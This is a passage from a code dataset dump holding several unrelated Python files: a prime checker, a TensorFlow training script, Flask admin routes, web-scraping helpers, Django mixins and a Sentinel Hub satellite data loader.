ChannelConverter.get_computed_f_using_squares(*predicted[0:3])\n ]\n return [\n get_metric(element=elements[i], expected=expected[i], actual=predicted[i])\n for i in range(len(elements))\n ]\n","sub_path":"geomagio/adjusted/AdjustedMatrix.py","file_name":"AdjustedMatrix.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"30771444","text":"k = input(\"Enter a Number to check for for prime : \")\nnum=int(k)\ni=2\nflag = 0\nif (num == 2) :\n print (\"Prime Number\")\nelif num < 2 :\n print (\"Not a Prime Number and must enter a positive real Number greater than 2\")\nelse :\n while(i <= num/2) :\n if num % i == 0 :\n flag =1\n break\n i = i+1\n if flag == 0: \n print (\"Prime Number\")\n else:\n print (\"Not a Prime Number\")\n","sub_path":"Algorithms/Maths/Prime Number/prime_number.py","file_name":"prime_number.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"136192090","text":"import sys\nimport os\nimport logging\nfrom datetime import datetime\nimport tensorflow as tf\nimport json\nimport shutil\n\nsys.path.append('../tf_scripts/')\nsys.path.append('../tf_scripts/architecture/')\n\nfrom tools.basic_logging import initialize_logger\nfrom resnet3D_model import resnet3D\nfrom modules import metrics\nfrom modules.train_singlegpu import train\nfrom io_modules.list_iterator_classification import List_Iterator\nfrom modules import image_summaries\n#from hellsicht.tensorflow.modules.train_multigpu import train\n\n\nfrom config import H\n\ndef train_net():\n\n # Create a new train directory, where to save all.log and config.json\n #H['output_dir'] = 'output_dir/train_dir/%s' % datetime.now().strftime('%Y_%m_%d_%H.%M')\n if not tf.gfile.Exists(H['output_dir']):\n tf.gfile.MakeDirs(H['output_dir'])\n with open(H['output_dir'] + '/config.json', 'w') as conf_file:\n json.dump(H, conf_file, indent = 4)\n \n shutil.copy('../tf_scripts/architecture/model_def/resnet3D.py',H['output_dir']+'/resnet3D.py')\n shutil.copytree('../tf_scripts/architecture/',H['output_dir']+'/architecture')\n shutil.copytree('../tf_scripts/io_modules/',H['output_dir']+'/io_modules') \n initialize_logger(folder=H['output_dir'])\n\n\n with tf.Graph().as_default(), tf.device('/cpu:0'):\n\n train_data_iter = List_Iterator(H, img_lst = H['train_lst'],\n img_shape = H['image_shape'],\n label_shape = H['label_shape'],\n batch_size = H['batch_size'],\n num_preprocess_threads = 4,\n shuffle = True,\n is_training = True,\n )\n\n valid_data_iter = List_Iterator(H, img_lst = H['val_lst'], \n img_shape = H['image_shape'],\n label_shape = H['label_shape'],\n batch_size = H['batch_size'],\n num_preprocess_threads = 4,\n shuffle = True,\n is_training = False,\n )\n\n model = resnet3D\n\n update_scopes = [] \n #update_scopes.append('logits')\n\n # Loss operations \n\n loss_op = metrics.logloss\n\n\n # Additional Evaluation metrics\n metric_ops = None# [metrics.MSE_metric]\n\n H['train_image_summary'] = image_summaries.classification_image_summary\n H['validation_image_summary'] = image_summaries.classification_image_summary\n\n H['model_graph'] = model\n H['loss'] = loss_op\n H['metrics'] = metric_ops\n H['train_scopes'] = update_scopes\n H['train_iter'] = train_data_iter\n H['valid_iter'] = valid_data_iter\n H['VARIABLES_TO_RESTORE'] = tf.contrib.slim.get_variables_to_restore()\n H['UPDATE_OPS_COLLECTION'] = tf.GraphKeys.UPDATE_OPS\n\n args = []\n train(*args, **H)\n\ndef main(argv=None):\n train_net()\n\nif __name__ == '__main__':\n os.environ['CUDA_VISIBLE_DEVICES'] = ','.join([str(i) for i in H['gpus']])\n tf.app.run()\n","sub_path":"dsb3_networks/classification/luna_resnet3D/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"492481573","text":"import logging\nfrom flask import Blueprint, render_template, redirect, url_for, flash, make_response, request, send_from_directory\nfrom flask import current_app as app\nfrom flask_login import current_user, login_user, logout_user, login_required\nfrom flask_mail import Message, Mail\nfrom werkzeug.urls import url_parse\nfrom werkzeug.utils import secure_filename\nfrom sqlalchemy import inspect\nfrom app.models import User, Booking, Event, Location\nfrom app.forms import EventForm, UpdateForm, UpdateLForm, AdminRemoveForm, LocationForm\nfrom app.extensions import mail, login_manager, db\nimport datetime\nfrom datetime import datetime\nimport os\n\nMODEL_ATTRIBUTES = ['get_id', 'is_active', 'is_anonymous', 'is_authenticated', 'metadata', 'query', 'query_class']\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']\n\n#blueprint setup\nadmin_panel = Blueprint('admin_panel',\n\t\t\t__name__,\n\t\t\tstatic_folder=\"static\",\n\t\t\ttemplate_folder=\"templates\",\n\t\t\turl_prefix='/admin')\n\ndef validation(user):\n if user.su_rights == False:\n app.logger.info(\"Attempt to access Admin Panel by User ID {} at {}\".format(current_user.id, datetime.now()))\n return False\n else:\n return True \n\n@admin_panel.route('/main', methods=['GET', 'POST'])\n@login_required\ndef main():\n if request.method == 'POST': \n app.logger.info('Logs retrieved by Admin ID {} at {}'.format(current_user.id, datetime.now())) \n return send_from_directory(app.config['LOGS_FOLDER'], \"information.log\", as_attachment=True)\n return render_template('/main.html') if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n@admin_panel.route('/alldata', methods=['GET', 'POST'])\n@login_required\ndef alldata():\n return render_template('/alldata.html') if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n@admin_panel.route('/alldata/', methods=['GET', 'POST'])\n@login_required\ndef alldata_stype(sub_type):\n if sub_type == 'users':\n data = User.query.all()\n elif sub_type == 'bookings':\n data = Booking.query.all()\n elif sub_type == 'events':\n data = Event.query.all()\n elif sub_type == 'locations':\n data = Location.query.all()\n\n if request.method == 'POST':\n user = User.query.filter(User.id==request.form['idValue']).first()\n if request.form['modType'] == \"revoke\": \n user.su_rights = False \n app.logger.info('User ID {} demoted to user by Admin ID {} at {}'.format(user.id, current_user.id, datetime.now()))\n else: \n user.su_rights = True\n app.logger.info('User ID {} promoted to admin by Admin ID {} at {}'.format(user.id, current_user.id, datetime.now()))\n db.session.commit()\n\n return redirect(url_for('admin_panel.alldata_stype', sub_type='users'))\n\n return render_template('alldata_stype.html', sub_type=sub_type, data=data)\n\n@admin_panel.route('/event_create', methods=['GET', 'POST'])\n@login_required\ndef event_create():\n form = EventForm()\n form.location.choices = [(location.id, location.name) for location in Location.query.all()]\n\n if form.validate_on_submit():\n event = Event(name=form.name.data,\n capacity=form.capacity.data,\n max_capacity=form.capacity.data,\n start=form.start_date.data,\n end=form.end_date.data,\n location_id=form.location.data,\n img_name=form.img_name.data.filename,\n description=form.description.data)\n \n file = form.img_name.data\n\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename);\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n db.session.add(event)\n db.session.commit()\n app.logger.info('Event {} created by Admin ID {} at {}'.format(event.name, current_user.id, datetime.now()))\n return redirect(url_for('admin_panel.alldata_stype', sub_type='events'))\n\n return render_template('/event_create.html', form=form) if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n\n@admin_panel.route('/location_create', methods=['GET', 'POST'])\ndef location_create():\n\n form = LocationForm()\n if form.validate_on_submit():\n db.session.add(Location(name=form.name.data, address=form.address.data))\n db.session.commit()\n flash(\"Successfully created Location: {}\".format(form.name.data), 'info')\n app.logger.info('Location {} created by Admin ID {} at {}'.format(form.name.data, current_user.id, datetime.now()))\n return redirect(url_for('admin_panel.alldata_stype', sub_type='locations'))\n \n return render_template('/location_create.html', form=form) if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n@admin_panel.route('/event_modify', methods=['GET', 'POST'])\ndef event_modify():\n data = Event.query.all()\n\n form = AdminRemoveForm()\n form.model_type.data = \"event\"\n\n if form.validate_on_submit():\n #check for existing bookings\n if Booking.query.filter(Booking.event_id==form.event_id.data).first() != None:\n flash(\"There's an existing booking/location for this event.\", \"error\")\n else:\n Event.query.filter(Event.id==form.event_id.data).delete()\n db.session.commit()\n app.logger.info('Event ID {} deleted by Admin ID {} at {}'.format(form.event_id.data, current_user.id, datetime.now()))\n\n return redirect(url_for('admin_panel.event_modify'))\n\n return render_template('/modify.html', data=data, form=form) if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n\n@admin_panel.route('/event_modify/', methods=['GET', 'POST'])\ndef event_mod(event_id):\n event = Event.query.filter(Event.id==event_id).first()\n locations = Location.query.all()\n form = UpdateForm()\n form.capacity.data = event.capacity\n\n form.org_cap.data = event.max_capacity\n form.org_name.data = event.name\n form.org_start_date.data = event.start\n form.org_end_date.data = event.end\n \n if form.validate_on_submit():\n if form.name.data is not \"\":\n event.name = form.name.data\n flash(\"Event name changed from {} to {}.\".format(form.org_name.data, form.name.data))\n \n if form.max_cap.data is not None:\n event.max_capacity = form.max_cap.data\n difference = form.max_cap.data - form.org_cap.data\n event.capacity = event.capacity + difference\n flash(\"Max capacity for {} modified from {} to {}.\".format(event.name, form.org_cap.data, form.max_cap.data), \"info\")\n\n if form.start_date.data is not None:\n event.start = form.start_date.data\n flash(\"Event {} start date modified from {} to {}.\".format(event.name, form.org_start_date.data, form.start_date.data), \"info\")\n\n if form.end_date.data is not None:\n event.end = form.end_date.data\n flash(\"Event {} end date modified from {} to {}.\".format(event.name, form.org_end_date.data, form.end_date.data), \"info\")\n\n if form.img_name.data is not None and event.img_name is not form.img_name.data: \n file = form.img_name.data\n\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename);\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n event.img_name = form.img_name.data.filename\n\n if form.description.data is not None and form.description.data is not \"\":\n event.description = form.description.data\n\n db.session.commit()\n app.logger.info('Event ID {} modified by Admin ID {} at {}'.format(event_id, current_user.id, datetime.now()))\n return redirect(url_for('admin_panel.event_modify'))\n \n return render_template('event_modify_id.html', form=form, event=event, locations=locations) if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n\n@admin_panel.route('/location_modify', methods=['GET', 'POST'])\ndef location_modify():\n data = Location.query.all()\n\n form = AdminRemoveForm()\n form.model_type.data = \"location\"\n\n if form.validate_on_submit():\n if Event.query.filter(Event.location_id==form.location_id.data).first() != None:\n flash(\"existing records, please delete before removal\", \"error\")\n else:\n Location.query.filter(Location.id==form.location_id.data).delete()\n db.session.commit()\n app.logger.info('Location ID {} deleted by Admin ID {} at {}'.format(form.location_id.data, current_user.id, datetime.now())) \n\n return redirect(url_for('admin_panel.location_modify'))\n\n return render_template('/modify.html', data=data, form=form) if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n\n@admin_panel.route('/location_modify/', methods=['GET', 'POST'])\ndef location_mod(location_id):\n location = Location.query.filter(Location.id==location_id).first()\n form = UpdateLForm()\n\n if form.validate_on_submit():\n if form.address.data is not \"\":\n location.address = form.address.data\n db.session.commit()\n app.logger.info('Location ID {} modified by Admin ID {} at {}'.format(location.id, current_user.id, datetime.now())) \n\n return redirect(url_for('admin_panel.location_modify'))\n\n return render_template('/location_modify_id.html', form=form, location=location) if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n","sub_path":"app/admin/admin_routes.py","file_name":"admin_routes.py","file_ext":"py","file_size_in_byte":9733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"619019799","text":"import unittest\nfrom src.utils.validates import validate_year\n\n\nclass TestValidateYear(unittest.TestCase):\n def test_valid_string(self):\n for i in range(2000, 2005):\n self.assertTrue(validate_year(i), msg='The year %s is not valid!' % i)\n\n def test_not_string(self):\n for i in range(-2005, -2000):\n self.assertFalse(validate_year(i), msg='The year %s is valid!' % i)\n for i in range(2050, 2055):\n self.assertFalse(validate_year(i), msg='The year %s is valid!' % i)\n","sub_path":"tests/utils/validates/validate_year.py","file_name":"validate_year.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"120760418","text":"from bs4 import BeautifulSoup as BS, SoupStrainer\nfrom bs4.element import Comment\nfrom lxml import etree\nimport re\nfrom chrome_driver.chrome_driver import ChromeDriver\nfrom component.file_processor.file_handler import FileHandler\n\n\nclass TagFinder:\n\n def __init__(self, query_tag: str, source_code: str):\n self.query_tag = query_tag\n self.source_code = source_code\n\n def find_availability(self):\n soup = BS(self.source_code, \"lxml\")\n total_found_length = len(soup.find_all(self.query_tag))\n if len(soup.find_all(self.query_tag)) == 0:\n available = \"No\"\n return available, total_found_length\n else:\n available = \"Yes\"\n return available, total_found_length\n\n def find_hyperlinks(self):\n count = 0\n for link in BS(self.source_code, \"lxml\", parse_only=SoupStrainer('a')):\n if link.has_attr('href'):\n count = count + 1\n return count\n\n def tag_visible(self, element):\n if element.parent.name in ['style', 'script', 'head', 'meta', '[document]']:\n return False\n if isinstance(element, Comment):\n return False\n return True\n\n def find_prices(self):\n soup = BS(self.source_code, 'lxml')\n texts = soup.findAll(text=True)\n visible_texts = filter(self.tag_visible, texts)\n visible_text = u\" \".join(t.strip() for t in visible_texts)\n prices = re.findall(r'\\s?(USD|EUR|€|£|\\$)(? 0:\n return \"Yes\"\n return \"No\"\n\n def find_cta(self, cta_keyword):\n soup = BS(self.source_code, 'lxml')\n buttons = soup.findAll('button')\n a_tags_ctas = soup.findAll('a')\n div_buttons = [element for element in\n soup.select('div[class*=\"button\"]')] ###checks div class which contains button\n div_buttons_short = [element for element in\n soup.select('div[class*=\"btn\"]')] ##checks div class which contains button\n\n buttons_button_text = [i.text.strip() for i in buttons]\n atags_text = [atags.text.strip() for atags in a_tags_ctas]\n div_button_text = [i.text.strip() for i in div_buttons]\n div_buttons_short_text = [i.text.strip() for i in div_buttons_short]\n all_button_text = div_button_text + buttons_button_text + div_buttons_short_text + atags_text\n all_button_text = list(filter(None, all_button_text))\n\n cta_count = 0\n for button_text in all_button_text:\n for keyword in cta_keyword:\n if keyword.lower() in button_text.lower():\n cta_count = cta_count + 1\n # print(all_button_text)\n # print(\"cta count \", str(cta_count))\n return cta_count\n\n def find_video_status(self):\n soup = BS(self.source_code, 'lxml')\n video_tags = soup.findAll('video')\n if len(video_tags) > 0:\n return \"Yes\"\n else:\n iframe_src = [iframe for iframe in soup.find_all('iframe')]\n if len(iframe_src) > 0:\n for iframe in iframe_src:\n if iframe.has_attr('src'):\n if 'youtube' in iframe['src']:\n print(\"youtube\")\n return \"Yes\"\n elif 'vimeo' in iframe['src']:\n return \"Yes\"\n\n video_tags = [element for element in soup.select('div[class*=\"video\"]')]\n if len(video_tags) > 0:\n return \"Yes\"\n return \"No\"\n\n def find_pop_up(self):\n soup = BS(self.source_code, 'lxml')\n page_modal_class = [element for element in soup.select('div[class*=\"modal\"]')]\n page_popup_class = [element for element in soup.select('div[class*=\"popup\"]')]\n page_modal_id = [element for element in soup.select('div[id*=\"modal\"]')]\n page_popup_id = [element for element in soup.select('div[id*=\"popup\"]')]\n popup = page_modal_class + page_popup_class + page_modal_id + page_popup_id\n if len(popup) > 0:\n return \"Yes\"\n return \"No\"\n\n\nif __name__ == '__main__':\n cta_keywords_file_name = 'cta-keywords.csv'\n file_worker = FileHandler()\n cta_keywords_df = file_worker.file_reader(cta_keywords_file_name)\n cta_keywords = cta_keywords_df['keywords'].tolist()\n url = \"https://www.dkawellness.com/dka--bb-fruitadv-tba/?time_elapsed=1&tab_comp=1&noplay=1&controls=1\"\n # chrome_driver = ChromeDriver()\n # chrome_browser = chrome_driver.get_chrome_driver()\n # chrome_browser.get(url)\n # source_code = chrome_browser.page_source\n # TagFinder('', source_code).find_cta(cta_keywords)\n TagFinder('', \"\").find_video_status()\n","sub_path":"component/metrics_worker/tag_finder.py","file_name":"tag_finder.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"526112990","text":"from django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.utils.decorators import method_decorator\nfrom django.http import Http404\n\nclass StaffRequiredMixin(object):\n @classmethod\n def as_view(self, *args, **kwargs):\n view = super(StaffRequiredMixin, self).as_view(*args, **kwargs)\n return login_required(view)\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n if request.user.is_staff:\n return super(StaffRequiredMixin, self).dispatch(request, *args, **kwargs)\n else:\n raise Http404\n\n\nclass LoginRequiredMixin(object):\n @classmethod\n def as_view(self, *args, **kwargs):\n view = super(LoginRequiredMixin, self).as_view(*args, **kwargs)\n return login_required(view)\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n return super(LoginRequiredMixin, self).dispatch(request, *args, **kwargs)\n\n\nclass FilterMixin(object):\n filter_class = None\n search_ordering_param = 'ordering'\n\n def get_queryset(self, *args, **kwargs):\n try:\n qs = super(FilterMixin, self).get_queryset(*args, **kwargs)\n return qs\n except:\n raise ImproperlyConfigured('You must have a queryset in order to use the FilterMixin')\n\n def get_context_data(self, *args, **kwargs):\n context = super(FilterMixin, self). get_context_data(*args, **kwargs)\n qs = self.get_queryset(*args, **kwargs)\n ordering = self.request.GET.get(self.search_ordering_param)\n if ordering:\n qs = qs.order_by(ordering)\n filter_class = self.filter_class\n if filter_class:\n fs = filter_class(self.request.GET, queryset=qs)\n context['object_list'] = fs\n return context\n","sub_path":"products/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"125595718","text":"import os\nfrom datetime import datetime, timedelta\nimport time\nimport re\nimport numpy as np\nimport xarray as xr\nimport requests\nfrom requests_futures.sessions import FuturesSession\nfrom concurrent.futures import ThreadPoolExecutor\nfrom osgeo import gdal\nfrom sentinelhub import WmsRequest, WcsRequest, MimeType, CRS, BBox, CustomUrlParam, BBoxSplitter\nfrom sentinelhub.constants import AwsConstants\nfrom sentinelhub.config import SHConfig\nimport sentinelhub.geo_utils\nfrom eolearn.core import FeatureType, EOPatch\nimport math\nimport imageio\nfrom dask import delayed\nimport dask.array as da\n\n\nfrom ._common import ProcessEOTask, ProcessArgumentInvalid, Internal\n\n\nSENTINELHUB_INSTANCE_ID = os.environ.get('SENTINELHUB_INSTANCE_ID', None)\nSENTINELHUB_LAYER_ID_S2L1C = os.environ.get('SENTINELHUB_LAYER_ID_S2L1C', None)\nSENTINELHUB_LAYER_ID_S1GRD = os.environ.get('SENTINELHUB_LAYER_ID_S1GRD', None)\n\ndef _clean_temporal_extent(temporal_extent):\n \"\"\"\n EOLearn expects the date strings not to include `Z` at the end, so we\n fix input here. It also doesn't deal with None, so we fix this.\n Note that this implementation is still not 100% correct, because we should\n also be accepting strings with *only time* for example.\n https://eo-learn.readthedocs.io/en/latest/eolearn.io.sentinelhub_service.html#eolearn.io.sentinelhub_service.SentinelHubOGCInput.execute\n \"\"\"\n\n # Check that only one of the intervals is None: (if any)\n # https://open-eo.github.io/openeo-api/processreference/#load_collection\n # > Also supports open intervals by setting one of the boundaries to null, but never both.\n if temporal_extent == [None, None]:\n raise ProcessArgumentInvalid(\"The argument 'temporal_extent' in process 'load_collection' is invalid: Only one boundary can be set to null.\")\n if not isinstance(temporal_extent,list) or len(temporal_extent) != 2:\n raise ProcessArgumentInvalid(\"The argument 'temporal_extent' in process 'load_collection' is invalid: The interval has to be specified as an array with exactly two elements.\")\n\n result = [None if t is None else t.rstrip('Z') for t in temporal_extent]\n if result[0] is None:\n result[0] = '1970-01-01'\n if result[1] is None:\n # result[1] = 'latest' # currently this doesn't work\n result[1] = datetime.utcnow().isoformat()\n return result\n\n\ndef _raise_exception_based_on_eolearn_message(str_ex):\n # EOLearn raises an exception which doesn't have the original data anymore, so we must\n # parse the message to figure out if the error was 4xx or 5xx.\n r = re.compile(r'Failed to download from:\\n([^\\n]+)\\nwith ([^:]+):\\n([4-5][0-9]{2}) ([^:]+): (.*)')\n m = r.match(str_ex)\n if m:\n g = m.groups()\n status_code = int(g[2])\n if 400 <= status_code < 500:\n raise ProcessArgumentInvalid(f\"The argument '' in process 'load_collection' is invalid: {str_ex}\")\n\n # we can't make sense of the message, bail out with generic exception:\n raise Internal(\"Server error: EOPatch creation failed: {}\".format(str_ex))\n\n\ndef validate_bands(bands, ALL_BANDS, collection_id):\n if bands is None:\n return ALL_BANDS\n if not set(bands).issubset(ALL_BANDS):\n valids = \",\".join(ALL_BANDS)\n raise ProcessArgumentInvalid(\"The argument 'bands' in process 'load_collection' is invalid: Invalid bands encountered; valid bands for {} are '[{}]'.\".format(collection_id,valids))\n return bands\n\n\ndef get_orbit_dates(dates):\n \"\"\"\n We calculate orbit dates by grouping together those dates that are less than an hour apart.\n Returns a list of objects, each with keys \"from\" and \"to\", containing datetime structs.\n \"\"\"\n sorted_dates = sorted(dates)\n result = []\n for d in sorted_dates:\n if len(result) == 0 or d - result[-1][\"to\"] > timedelta(hours=1):\n result.append({\"from\": d, \"to\": d}) # new orbit\n else:\n result[-1][\"to\"] = d # same orbit\n\n return result\n\n\ndef construct_image(data, n_width, n_height):\n rows = []\n for i in range(n_height):\n print(data[i::n_height])\n rows.append(da.concatenate(data[i::n_height], axis=1))\n return da.concatenate(rows[::-1], axis=0)\n\n\ndef download_data(self, dataset, orbit_dates, total_width, total_height, bbox, temporal_extent, bands, dataFilter_params, max_chunk_size=1000):\n auth_token = SHProcessingAuthTokenSingleton.get()\n url = 'https://services.sentinel-hub.com/api/v1/process'\n headers = {\n 'Accept': 'image/tiff',\n 'Authorization': f'Bearer {auth_token}'\n }\n\n n_width = math.ceil(total_width/max_chunk_size)\n n_height = math.ceil(total_height/(max_chunk_size*max_chunk_size/(total_width//n_width + 1)))\n bbox_list = BBoxSplitter([bbox.geometry], CRS.WGS84, (n_width, n_height)).get_bbox_list()\n x_image_shapes = [total_width//n_width + 1 if w < total_width % n_width else total_width//n_width for w in range(n_width)]\n y_image_shapes = [total_height//n_height + 1 if h < total_height % n_height else total_height//n_height for h in range(n_height)]\n\n adapter_kwargs = dict(pool_maxsize=len(orbit_dates)*n_width*n_height)\n executor = ThreadPoolExecutor(max_workers=len(orbit_dates)*n_width*n_height)\n requests_session = FuturesSession(executor=executor, adapter_kwargs=adapter_kwargs)\n response_futures = {}\n\n orbit_times_middle,shapes = [],{}\n\n tmp_folder = f\"/tmp-{self.job_id}\"\n if os.path.exists(tmp_folder):\n os.rmdir(tmp_folder)\n os.mkdir(tmp_folder)\n\n for i, date in enumerate(orbit_dates):\n mean_time = date[\"from\"] + (date[\"to\"] - date[\"from\"]) / 2\n tile_from = mean_time - timedelta(minutes=25)\n tile_to = mean_time + timedelta(minutes=25)\n orbit_times_middle.append(mean_time)\n shapes[i] = []\n\n for j, bbox_section in enumerate(bbox_list):\n request_params = {\n \"input\": {\n \"bounds\": {\n \"bbox\": [bbox_section.min_x, bbox_section.min_y, bbox_section.max_x, bbox_section.max_y],\n \"properties\": {\n \"crs\": \"http://www.opengis.net/def/crs/EPSG/0/4326\",\n }\n },\n \"data\": [\n {\n \"type\": dataset,\n \"dataFilter\": {\n \"timeRange\": {\n \"from\": tile_from.strftime(\"%Y-%m-%dT%H:%M:%S+00:00\"),\n \"to\": tile_to.strftime(\"%Y-%m-%dT%H:%M:%S+00:00\"),\n },\n **dataFilter_params,\n }\n },\n ],\n },\n \"output\": {\n \"width\": x_image_shapes[j//n_height],\n \"height\": y_image_shapes[j%n_height],\n },\n \"evalscript\": f\"\"\"//VERSION=3\n\n function setup() {{\n return {{\n input: [{', '.join([f'\"{b}\"' for b in bands])}, \"dataMask\"],\n output: {{\n bands: {len(bands) + 1},\n sampleType: \"FLOAT32\",\n }}\n }}\n }}\n\n function evaluatePixel(sample) {{\n return [{\", \".join(['sample.' + b for b in bands])}, sample.dataMask]\n }}\n \"\"\"\n }\n shapes[i].append((y_image_shapes[j%n_height],x_image_shapes[j//n_height],len(bands)+1))\n r = requests_session.post(url, headers=headers, json=request_params)\n response_futures[r] = {\"date\":i,\"bbox\":j}\n\n dates_filenames = {}\n\n for r_future, indices in response_futures.items():\n r = r_future.result()\n if r.status_code != 200:\n raise Internal(r.content)\n self.logger.debug('Image received.')\n\n tmp_filename = f'{tmp_folder}/image-{indices[\"date\"]}-{indices[\"bbox\"]}.tiff'\n if dates_filenames.get(indices[\"date\"]) is None:\n dates_filenames[indices[\"date\"]] = [tmp_filename]\n else:\n dates_filenames[indices[\"date\"]].append(tmp_filename)\n with open(tmp_filename, 'wb') as f:\n f.write(r.content)\n\n response_data = []\n for i in range(len(orbit_dates)):\n images = [delayed(imageio.imread)(filename) for filename in dates_filenames[i]]\n images = [da.from_delayed(image, shape=shapes[i][j], dtype=np.float32) for j,image in enumerate(images)]\n image_gdal = construct_image(images, n_width, n_height)\n response_data.append(image_gdal)\n\n response_data = da.stack(response_data)\n self.logger.debug('Images created.')\n return response_data, orbit_times_middle\n\n\nclass SHProcessingAuthTokenSingleton(object):\n _access_token = None\n _valid_until = None\n\n @classmethod\n def get(cls):\n if cls._access_token is not None and cls._valid_until > time.time():\n return cls._access_token\n\n client_id = os.environ.get('SH_CLIENT_ID')\n auth_secret = os.environ.get('SH_AUTH_SECRET')\n if not client_id or not auth_secret:\n raise Internal(\"Missing SH credentials\")\n\n url = 'https://services.sentinel-hub.com/oauth/token'\n data = f'grant_type=client_credentials&client_id={client_id}&client_secret={auth_secret}'\n r = requests.post(url, headers={'Content-Type': 'application/x-www-form-urlencoded'}, data=data)\n if r.status_code != 200:\n raise Internal(\"Error authenticating, received code: \" + str(r.status_code))\n\n j = r.json()\n cls._access_token = j[\"access_token\"]\n cls._valid_until = time.time() + j[\"expires_in\"] - 5\n return cls._access_token\n\n\nclass load_collectionEOTask(ProcessEOTask):\n @staticmethod\n def _convert_bbox(spatial_extent):\n crs = spatial_extent.get('crs', 4326)\n return BBox(\n (spatial_extent['west'],\n spatial_extent['south'],\n spatial_extent['east'],\n spatial_extent['north'],),\n CRS(crs), # we support whatever sentinelhub-py supports\n )\n\n\n def process(self, arguments):\n start_time = time.time()\n collection_id = self.validate_parameter(arguments, \"id\", required=True, allowed_types=[str])\n spatial_extent = self.validate_parameter(arguments, \"spatial_extent\", required=True)\n temporal_extent = self.validate_parameter(arguments, \"temporal_extent\", required=True)\n temporal_extent = _clean_temporal_extent(temporal_extent)\n bands = self.validate_parameter(arguments, \"bands\", default=None, allowed_types=[type(None), list])\n\n if bands is not None and not len(bands):\n raise ProcessArgumentInvalid(\"The argument 'bands' in process 'load_collection' is invalid: At least one band must be specified.\")\n\n bbox = load_collectionEOTask._convert_bbox(spatial_extent)\n\n # check if the bbox is within the allowed limits:\n options = arguments.get(\"options\", {})\n if options.get(\"width\") or options.get(\"height\"):\n width = options.get(\"width\", options.get(\"height\"))\n height = options.get(\"height\", options.get(\"width\"))\n else:\n width, height = sentinelhub.geo_utils.bbox_to_dimensions(bbox, 10.0)\n\n band_aliases = {}\n\n if collection_id == 'S2L1C':\n dataset = \"S2L1C\"\n ALL_BANDS = AwsConstants.S2_L1C_BANDS\n bands = validate_bands(bands, ALL_BANDS, collection_id)\n DEFAULT_RES = '10m'\n kwargs = dict(\n layer=SENTINELHUB_LAYER_ID_S2L1C,\n maxcc=1.0, # maximum allowed cloud cover of original ESA tiles\n )\n dataFilter_params = {\n \"previewMode\": \"EXTENDED_PREVIEW\",\n }\n band_aliases = {\n \"nir\": \"B08\",\n \"red\": \"B04\",\n }\n\n elif collection_id == 'S1GRDIW':\n dataset = \"S1GRD\"\n # https://docs.sentinel-hub.com/api/latest/#/data/Sentinel-1-GRD?id=available-bands-and-data\n ALL_BANDS = ['VV', 'VH']\n bands = validate_bands(bands, ALL_BANDS, collection_id)\n\n # https://docs.sentinel-hub.com/api/latest/#/data/Sentinel-1-GRD?id=resolution-pixel-spacing\n # Value Description\n # HIGH 10m/px for IW and 25m/px for EW\n # MEDIUM 40m/px for IW and EW\n # https://sentinel-hub.com/develop/documentation/eo_products/Sentinel1EOproducts\n # Sensing Resolution:\n # - Medium\n # - High\n # Similarly to polarization, not all beam mode/polarization combinations will have data\n # at the chosen resolution. IW is typically sensed in High resolution, EW in Medium.\n DEFAULT_RES = '10m'\n kwargs = dict(\n layer=SENTINELHUB_LAYER_ID_S1GRD,\n )\n dataFilter_params = {}\n band_aliases = {}\n\n else:\n raise ProcessArgumentInvalid(\"The argument 'id' in process 'load_collection' is invalid: unknown collection id\")\n\n self.logger.debug(f'Requesting dates between: {temporal_extent}')\n request = WmsRequest(\n **kwargs,\n instance_id=SENTINELHUB_INSTANCE_ID,\n bbox=bbox,\n time=temporal_extent,\n width=width,\n height=height,\n )\n dates = request.get_dates()\n orbit_dates = get_orbit_dates(dates)\n response_data,orbit_times_middle = download_data(self, dataset, orbit_dates, width, height, bbox, temporal_extent, bands, dataFilter_params)\n\n mask = response_data[:, :, :, -1:] # \":\" keeps the dimension\n mask = np.repeat(mask, len(bands), axis=-1).astype(bool)\n data = response_data[:, :, :, :-1]\n masked_data = da.ma.masked_array(data, mask=~mask)\n\n xrdata = xr.DataArray(\n masked_data,\n dims=('t', 'y', 'x', 'band'),\n coords={\n 'band': bands,\n 't': orbit_times_middle,\n },\n attrs={\n \"band_aliases\": band_aliases,\n \"bbox\": bbox,\n },\n )\n self.logger.debug(f'Returning xarray, job [{self.job_id}] execution time: {time.time() - start_time}')\n return xrdata\n","sub_path":"workers/process/load_collection.py","file_name":"load_collection.py","file_ext":"py","file_size_in_byte":14624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"336314264","text":"import time\nimport pygame\nimport 